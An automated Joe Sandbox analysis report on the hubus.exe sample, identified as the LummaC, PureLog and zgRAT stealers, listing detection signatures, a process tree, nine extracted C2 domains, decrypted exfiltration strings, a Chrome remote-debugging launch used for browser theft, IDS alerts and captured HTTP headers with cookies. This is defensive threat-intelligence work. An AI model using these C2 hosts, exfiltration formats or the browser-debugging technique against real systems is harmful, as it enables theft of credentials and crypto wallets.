Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
hubus.exe

Overview

General Information

Sample name:hubus.exe
(renamed file extension from dll to exe)
Original sample name:hubus.dll
Analysis ID:1578636
MD5:43f8e85b16887df9aee3d896bd1fd7e3
SHA1:f09fae91694982e2d5dafad61b1addf0aef0abd2
SHA256:8b1984efe2ed414eef8b8c8de34f03e3fdbccf0e4782dd8d1d958a7dbdef6e7d
Infos:

Detection

LummaC, PureLog Stealer, zgRAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Attempt to bypass Chrome Application-Bound Encryption
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected LummaC Stealer
Yara detected PureLog Stealer
Yara detected zgRAT
.NET source code contains method to dynamically call methods (often used by packers)
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
LummaC encrypted strings found
Machine Learning detection for sample
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Yara detected Costura Assembly Loader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to read the clipboard data
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Searches for user specific document files
Sigma detected: Browser Started with Remote Debugging
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Process Tree

  • System is w10x64native
  • hubus.exe (PID: 428 cmdline: "C:\Users\user\Desktop\hubus.exe" MD5: 43F8E85B16887DF9AEE3D896BD1FD7E3)
    • hubus.exe (PID: 4780 cmdline: "C:\Users\user\Desktop\hubus.exe" MD5: 43F8E85B16887DF9AEE3D896BD1FD7E3)
      • chrome.exe (PID: 7388 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default" MD5: BB7C48CDDDE076E7EB44022520F40F77)
        • chrome.exe (PID: 6932 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-subproc-heap-profiling --field-trial-handle=2720,i,2268975299143198714,4336465224231573627,262144 --variations-seed-version=20240909-180142.416000 --mojo-platform-channel-handle=2744 /prefetch:3 MD5: BB7C48CDDDE076E7EB44022520F40F77)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
NameDescriptionAttributionBlogpost URLsLink
zgRATzgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an inforstealer use which targets browser information and cryptowallets.Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat

Malware Configuration

Threatname: LummaC

{"C2 url": ["crosshuaht.lat", "testyhurriedo.click", "energyaffai.lat", "grannyejh.lat", "aspecteirs.lat", "necklacebudi.lat", "rapeflowwj.lat", "sustainskelet.lat", "discokeyus.lat"], "Build id": "jMw1IE--SHELLS"}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
hubus.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
    hubus.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security

      PCAP (Network Traffic)

      SourceRuleDescriptionAuthorStrings
      sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
        sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security

          Memory Dumps

          SourceRuleDescriptionAuthorStrings
          00000000.00000000.11852643145.0000000000A72000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
            00000000.00000002.12089048630.0000000005C90000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
              00000000.00000002.12074166269.00000000030B7000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
                00000001.00000002.12268716447.0000000001594000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                  Process Memory Space: hubus.exe PID: 428JoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
                    Click to see the 4 entries

                    Unpacked PEs

                    SourceRuleDescriptionAuthorStrings
                    0.2.hubus.exe.5c90000.7.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
                      0.0.hubus.exe.a70000.0.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                        0.0.hubus.exe.a70000.0.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security

                          Sigma Signatures

                          Sigma detected: Browser Started with Remote Debugging
                          Source: Process startedAuthor: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default", CommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default", CommandLine|base64offset|contains: ^", Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: "C:\Users\user\Desktop\hubus.exe", ParentImage: C:\Users\user\Desktop\hubus.exe, ParentProcessId: 4780, ParentProcessName: hubus.exe, ProcessCommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default", ProcessId: 7388, ProcessName: chrome.exe

                          Suricata Signatures

                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-12-20T00:58:24.104291+010020283713Unknown Traffic192.168.11.2049744104.21.112.1443TCP
                          2024-12-20T00:58:25.047908+010020283713Unknown Traffic192.168.11.2049745104.21.112.1443TCP
                          2024-12-20T00:58:34.058030+010020283713Unknown Traffic192.168.11.2049760104.21.112.1443TCP
                          2024-12-20T00:58:35.185431+010020283713Unknown Traffic192.168.11.2049761104.21.112.1443TCP
                          2024-12-20T00:58:36.342508+010020283713Unknown Traffic192.168.11.2049762104.21.112.1443TCP
                          2024-12-20T00:58:37.318729+010020283713Unknown Traffic192.168.11.2049763104.21.112.1443TCP
                          2024-12-20T00:58:38.278410+010020283713Unknown Traffic192.168.11.2049764104.21.112.1443TCP
                          2024-12-20T00:58:39.539585+010020283713Unknown Traffic192.168.11.2049765104.21.112.1443TCP
                          2024-12-20T00:58:42.379010+010020283713Unknown Traffic192.168.11.2049766104.21.112.1443TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-12-20T00:58:24.759785+010020546531A Network Trojan was detected192.168.11.2049744104.21.112.1443TCP
                          2024-12-20T00:58:25.772976+010020546531A Network Trojan was detected192.168.11.2049745104.21.112.1443TCP
                          2024-12-20T00:58:42.933024+010020546531A Network Trojan was detected192.168.11.2049766104.21.112.1443TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-12-20T00:58:24.759785+010020498361A Network Trojan was detected192.168.11.2049744104.21.112.1443TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-12-20T00:58:25.772976+010020498121A Network Trojan was detected192.168.11.2049745104.21.112.1443TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-12-20T00:58:38.815041+010020480941Malware Command and Control Activity Detected192.168.11.2049764104.21.112.1443TCP

                          Joe Sandbox Signatures

                          Click to jump to signature section

                          Show All Signature Results

                          AV Detection

                          barindex
                          Antivirus / Scanner detection for submitted sample
                          Source: hubus.exeAvira: detected
                          Found malware configuration
                          Source: 1.2.hubus.exe.400000.0.raw.unpackMalware Configuration Extractor: LummaC {"C2 url": ["crosshuaht.lat", "testyhurriedo.click", "energyaffai.lat", "grannyejh.lat", "aspecteirs.lat", "necklacebudi.lat", "rapeflowwj.lat", "sustainskelet.lat", "discokeyus.lat"], "Build id": "jMw1IE--SHELLS"}
                          Multi AV Scanner detection for submitted file
                          Source: hubus.exeReversingLabs: Detection: 36%
                          Machine Learning detection for sample
                          Source: hubus.exeJoe Sandbox ML: detected
                          Sample uses string decryption to hide its real strings
                          Source: 1.2.hubus.exe.400000.0.raw.unpackString decryptor: rapeflowwj.lat
                          Source: 1.2.hubus.exe.400000.0.raw.unpackString decryptor: crosshuaht.lat
                          Source: 1.2.hubus.exe.400000.0.raw.unpackString decryptor: sustainskelet.lat
                          Source: 1.2.hubus.exe.400000.0.raw.unpackString decryptor: aspecteirs.lat
                          Source: 1.2.hubus.exe.400000.0.raw.unpackString decryptor: energyaffai.lat
                          Source: 1.2.hubus.exe.400000.0.raw.unpackString decryptor: necklacebudi.lat
                          Source: 1.2.hubus.exe.400000.0.raw.unpackString decryptor: discokeyus.lat
                          Source: 1.2.hubus.exe.400000.0.raw.unpackString decryptor: grannyejh.lat
                          Source: 1.2.hubus.exe.400000.0.raw.unpackString decryptor: testyhurriedo.click
                          Source: 1.2.hubus.exe.400000.0.raw.unpackString decryptor: lid=%s&j=%s&ver=4.0
                          Source: 1.2.hubus.exe.400000.0.raw.unpackString decryptor: TeslaBrowser/5.5
                          Source: 1.2.hubus.exe.400000.0.raw.unpackString decryptor: - Screen Resoluton:
                          Source: 1.2.hubus.exe.400000.0.raw.unpackString decryptor: - Physical Installed Memory:
                          Source: 1.2.hubus.exe.400000.0.raw.unpackString decryptor: Workgroup: -
                          Source: 1.2.hubus.exe.400000.0.raw.unpackString decryptor: jMw1IE--SHELLS
                          Source: C:\Users\user\Desktop\hubus.exeCode function: 1_2_00419F2F CryptUnprotectData,1_2_00419F2F
                          Source: hubus.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                          Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.11.20:49744 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.11.20:49745 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.11.20:49760 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.11.20:49761 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.11.20:49762 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.11.20:49763 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.11.20:49764 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.11.20:49765 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.11.20:49766 version: TLS 1.2
                          Source: hubus.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                          Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: hubus.exe, 00000000.00000002.12084979136.0000000004235000.00000004.00000800.00020000.00000000.sdmp, hubus.exe, 00000000.00000002.12084979136.0000000004021000.00000004.00000800.00020000.00000000.sdmp, hubus.exe, 00000000.00000002.12088688040.0000000005C00000.00000004.08000000.00040000.00000000.sdmp
                          Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: hubus.exe, 00000000.00000002.12084979136.0000000004235000.00000004.00000800.00020000.00000000.sdmp, hubus.exe, 00000000.00000002.12084979136.0000000004021000.00000004.00000800.00020000.00000000.sdmp, hubus.exe, 00000000.00000002.12088688040.0000000005C00000.00000004.08000000.00040000.00000000.sdmp
                          Source: Binary string: protobuf-net.pdbSHA256}Lq source: hubus.exe, 00000000.00000002.12088018857.0000000005A30000.00000004.08000000.00040000.00000000.sdmp, hubus.exe, 00000000.00000002.12084979136.0000000004021000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: protobuf-net.pdb source: hubus.exe, 00000000.00000002.12088018857.0000000005A30000.00000004.08000000.00040000.00000000.sdmp, hubus.exe, 00000000.00000002.12084979136.0000000004021000.00000004.00000800.00020000.00000000.sdmp
                          Source: C:\Users\user\Desktop\hubus.exeCode function: 4x nop then jmp 05AABBBCh0_2_05AAB7E0
                          Source: C:\Users\user\Desktop\hubus.exeCode function: 4x nop then jmp 05AABBBCh0_2_05AAB7F0
                          Source: C:\Users\user\Desktop\hubus.exeCode function: 4x nop then jmp 05AAC1FDh0_2_05AAC16A
                          Source: C:\Users\user\Desktop\hubus.exeCode function: 4x nop then jmp 05AAC1FDh0_2_05AAC178
                          Source: C:\Users\user\Desktop\hubus.exeCode function: 4x nop then jmp 05AE2244h0_2_05AE1F20
                          Source: C:\Users\user\Desktop\hubus.exeCode function: 4x nop then jmp 05AE2244h0_2_05AE1F11
                          Source: C:\Users\user\Desktop\hubus.exeCode function: 4x nop then jmp eax1_2_00424010
                          Source: C:\Users\user\Desktop\hubus.exeCode function: 4x nop then movzx edi, byte ptr [esp+eax+04h]1_2_00424010
                          Source: C:\Users\user\Desktop\hubus.exeCode function: 4x nop then jmp ecx1_2_0043A8A0
                          Source: C:\Users\user\Desktop\hubus.exeCode function: 4x nop then mov byte ptr [eax], cl1_2_004170B8
                          Source: C:\Users\user\Desktop\hubus.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 29FCC5D8h1_2_004170B8
                          Source: C:\Users\user\Desktop\hubus.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], E785F9BAh1_2_004170B8
                          Source: C:\Users\user\Desktop\hubus.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 3FE33C50h1_2_004170B8
                          Source: C:\Users\user\Desktop\hubus.exeCode function: 4x nop then mov word ptr [edx], cx1_2_004189C3
                          Source: C:\Users\user\Desktop\hubus.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], E785F9BAh1_2_00414A00
                          Source: C:\Users\user\Desktop\hubus.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax-000000A6h]1_2_0041635B
                          Source: C:\Users\user\Desktop\hubus.exeCode function: 4x nop then movzx edi, byte ptr [eax]1_2_0040AC10
                          Source: C:\Users\user\Desktop\hubus.exeCode function: 4x nop then mov edx, eax1_2_0043ACD0
                          Source: C:\Users\user\Desktop\hubus.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], E1CE25DBh1_2_0043E4E0
                          Source: C:\Users\user\Desktop\hubus.exeCode function: 4x nop then mov edi, dword ptr [eax]1_2_004385A0
                          Source: C:\Users\user\Desktop\hubus.exeCode function: 4x nop then push eax1_2_004385A0
                          Source: C:\Users\user\Desktop\hubus.exeCode function: 4x nop then movzx eax, byte ptr [esp+edx]1_2_004385A0
                          Source: C:\Users\user\Desktop\hubus.exeCode function: 4x nop then mov byte ptr [eax], cl1_2_00415ED1
                          Source: C:\Users\user\Desktop\hubus.exeCode function: 4x nop then mov byte ptr [edi], al1_2_0041C7D5
                          Source: C:\Users\user\Desktop\hubus.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], 36D9DBB9h1_2_0043E870
                          Source: C:\Users\user\Desktop\hubus.exeCode function: 4x nop then movzx eax, byte ptr [esp+edi+1E1E4EFFh]1_2_004090B0
                          Source: C:\Users\user\Desktop\hubus.exeCode function: 4x nop then mov byte ptr [edx], cl1_2_004090B0
                          Source: C:\Users\user\Desktop\hubus.exeCode function: 4x nop then mov byte ptr [esi], cl1_2_0042D16A
                          Source: C:\Users\user\Desktop\hubus.exeCode function: 4x nop then mov dword ptr [esp], ecx1_2_0042991E
                          Source: C:\Users\user\Desktop\hubus.exeCode function: 4x nop then mov dword ptr [esp], ecx1_2_004291CB
                          Source: C:\Users\user\Desktop\hubus.exeCode function: 4x nop then movzx ebx, byte ptr [esp+ecx+53E0EF23h]1_2_0042D1D8
                          Source: C:\Users\user\Desktop\hubus.exeCode function: 4x nop then mov byte ptr [esi], cl1_2_0042D1D8
                          Source: C:\Users\user\Desktop\hubus.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]1_2_0042B980
                          Source: C:\Users\user\Desktop\hubus.exeCode function: 4x nop then mov eax, dword ptr [edi+0Ch]1_2_004022C0
                          Source: C:\Users\user\Desktop\hubus.exeCode function: 4x nop then push eax1_2_0043BB50
                          Source: C:\Users\user\Desktop\hubus.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+00000098h]1_2_0042EB0D
                          Source: C:\Users\user\Desktop\hubus.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+00000098h]1_2_0042EB16
                          Source: C:\Users\user\Desktop\hubus.exeCode function: 4x nop then jmp dword ptr [0044524Ch]1_2_00426339
                          Source: C:\Users\user\Desktop\hubus.exeCode function: 4x nop then mov edi, eax1_2_00402BD0
                          Source: C:\Users\user\Desktop\hubus.exeCode function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]1_2_004073F0
                          Source: C:\Users\user\Desktop\hubus.exeCode function: 4x nop then movzx ecx, word ptr [edi+esi*4]1_2_004073F0
                          Source: C:\Users\user\Desktop\hubus.exeCode function: 4x nop then mov ecx, edx1_2_0041DB89
                          Source: C:\Users\user\Desktop\hubus.exeCode function: 4x nop then cmp word ptr [esi+edx], 0000h1_2_0041DB89
                          Source: C:\Users\user\Desktop\hubus.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], E785F9BAh1_2_00416CE0
                          Source: C:\Users\user\Desktop\hubus.exeCode function: 4x nop then mov edx, ecx1_2_004094B0
                          Source: C:\Users\user\Desktop\hubus.exeCode function: 4x nop then mov edi, ebx1_2_0042E543
                          Source: C:\Users\user\Desktop\hubus.exeCode function: 4x nop then movzx eax, byte ptr [esp+edx-3Ah]1_2_0042DD6F
                          Source: C:\Users\user\Desktop\hubus.exeCode function: 4x nop then mov byte ptr [esi], al1_2_0042CD79
                          Source: C:\Users\user\Desktop\hubus.exeCode function: 4x nop then movzx edi, byte ptr [ebp+eax-36C2D23Bh]1_2_00427510
                          Source: C:\Users\user\Desktop\hubus.exeCode function: 4x nop then movzx eax, byte ptr [esp+edx+00000098h]1_2_0042DD10
                          Source: C:\Users\user\Desktop\hubus.exeCode function: 4x nop then mov eax, dword ptr [004471C4h]1_2_0043BD10
                          Source: C:\Users\user\Desktop\hubus.exeCode function: 4x nop then mov word ptr [ebx], ax1_2_0041953B
                          Source: C:\Users\user\Desktop\hubus.exeCode function: 4x nop then add esi, edi1_2_0042D4CA
                          Source: C:\Users\user\Desktop\hubus.exeCode function: 4x nop then mov byte ptr [esi], al1_2_0042CDAB
                          Source: C:\Users\user\Desktop\hubus.exeCode function: 4x nop then movzx ebx, byte ptr [edx]1_2_00434E50
                          Source: C:\Users\user\Desktop\hubus.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+3Ch]1_2_0041CE7A
                          Source: C:\Users\user\Desktop\hubus.exeCode function: 4x nop then mov byte ptr [esi], al1_2_0042CE0F
                          Source: C:\Users\user\Desktop\hubus.exeCode function: 4x nop then movzx ecx, word ptr [ebp+edx+02h]1_2_00438E17
                          Source: C:\Users\user\Desktop\hubus.exeCode function: 4x nop then cmp word ptr [ebp+esi+00h], 0000h1_2_0041DF70
                          Source: C:\Users\user\Desktop\hubus.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax-5Ch]1_2_0041DF70
                          Source: C:\Users\user\Desktop\hubus.exeCode function: 4x nop then jmp dword ptr [00444794h]1_2_00416F05
                          Source: C:\Users\user\Desktop\hubus.exeCode function: 4x nop then mov word ptr [ebx], cx1_2_0040C70C
                          Source: C:\Users\user\Desktop\hubus.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], E5FE86B7h1_2_0043AF80
                          Source: C:\Users\user\Desktop\hubus.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], E5FE86B7h1_2_0043AF80
                          Source: C:\Users\user\Desktop\hubus.exeCode function: 4x nop then cmp dword ptr [ebp+ebx*8+00h], C72EB52Eh1_2_0043AF80
                          Source: chrome.exeMemory has grown: Private usage: 0MB later: 36MB

                          Networking

                          barindex
                          Suricata IDS alerts for network traffic
                          Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.11.20:49744 -> 104.21.112.1:443
                          Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.11.20:49745 -> 104.21.112.1:443
                          Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.11.20:49744 -> 104.21.112.1:443
                          Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.11.20:49745 -> 104.21.112.1:443
                          Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.11.20:49764 -> 104.21.112.1:443
                          Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.11.20:49766 -> 104.21.112.1:443
                          C2 URLs / IPs found in malware configuration
                          Source: Malware configuration extractorURLs: crosshuaht.lat
                          Source: Malware configuration extractorURLs: testyhurriedo.click
                          Source: Malware configuration extractorURLs: energyaffai.lat
                          Source: Malware configuration extractorURLs: grannyejh.lat
                          Source: Malware configuration extractorURLs: aspecteirs.lat
                          Source: Malware configuration extractorURLs: necklacebudi.lat
                          Source: Malware configuration extractorURLs: rapeflowwj.lat
                          Source: Malware configuration extractorURLs: sustainskelet.lat
                          Source: Malware configuration extractorURLs: discokeyus.lat
                          Source: Joe Sandbox ViewIP Address: 104.21.112.1 104.21.112.1
                          Source: Joe Sandbox ViewIP Address: 239.255.255.250 239.255.255.250
                          Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                          Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.11.20:49744 -> 104.21.112.1:443
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.11.20:49745 -> 104.21.112.1:443
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.11.20:49765 -> 104.21.112.1:443
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.11.20:49761 -> 104.21.112.1:443
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.11.20:49760 -> 104.21.112.1:443
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.11.20:49764 -> 104.21.112.1:443
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.11.20:49762 -> 104.21.112.1:443
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.11.20:49763 -> 104.21.112.1:443
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.11.20:49766 -> 104.21.112.1:443
                          Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
                          Source: unknownTCP traffic detected without corresponding DNS query: 23.39.228.7
                          Source: unknownTCP traffic detected without corresponding DNS query: 199.232.214.172
                          Source: unknownTCP traffic detected without corresponding DNS query: 199.232.214.172
                          Source: unknownTCP traffic detected without corresponding DNS query: 173.194.219.94
                          Source: unknownTCP traffic detected without corresponding DNS query: 173.194.219.94
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: unknownUDP traffic detected without corresponding DNS query: 239.255.255.250
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: unknownUDP traffic detected without corresponding DNS query: 239.255.255.250
                          Source: unknownUDP traffic detected without corresponding DNS query: 239.255.255.250
                          Source: unknownUDP traffic detected without corresponding DNS query: 239.255.255.250
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: C:\Users\user\Desktop\hubus.exeCode function: 1_2_00420180 recv,1_2_00420180
                          Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CI+2yQEIorbJAQipncoBCMD2ygEIlKHLAQic/swBCIWgzQEIrJ7OAQjkr84BCMO2zgEIvbnOAQjtvM4BCLu9zgEI1r3OAQjMv84BGMHLzAEYva7OARidsc4BSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: NID=517=i4E8sm-BN75bnGkPw4VW8uy51aQ8ounjntfNX2fu8MFJNuIvCX0dRBy-XkHqHwKOVFSSaC2nqfULsnHhY3TzIXHWC90jS3Wi2BINtQIDr1LJvZE4Ud-byTNL9Q04Nd1-ydmJvrWYY5vORspW6soJ1bMj20dq8UvPjgkw2sOvmuTUanqu
                          Source: global trafficHTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CI+2yQEIorbJAQipncoBCMD2ygEIlKHLAQic/swBCIWgzQEIrJ7OAQjkr84BCMO2zgEIvbnOAQjtvM4BCLu9zgEI1r3OAQjMv84BGMHLzAEYva7OARidsc4BSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: NID=517=i4E8sm-BN75bnGkPw4VW8uy51aQ8ounjntfNX2fu8MFJNuIvCX0dRBy-XkHqHwKOVFSSaC2nqfULsnHhY3TzIXHWC90jS3Wi2BINtQIDr1LJvZE4Ud-byTNL9Q04Nd1-ydmJvrWYY5vORspW6soJ1bMj20dq8UvPjgkw2sOvmuTUanqu
                          Source: global trafficHTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: NID=517=i4E8sm-BN75bnGkPw4VW8uy51aQ8ounjntfNX2fu8MFJNuIvCX0dRBy-XkHqHwKOVFSSaC2nqfULsnHhY3TzIXHWC90jS3Wi2BINtQIDr1LJvZE4Ud-byTNL9Q04Nd1-ydmJvrWYY5vORspW6soJ1bMj20dq8UvPjgkw2sOvmuTUanqu
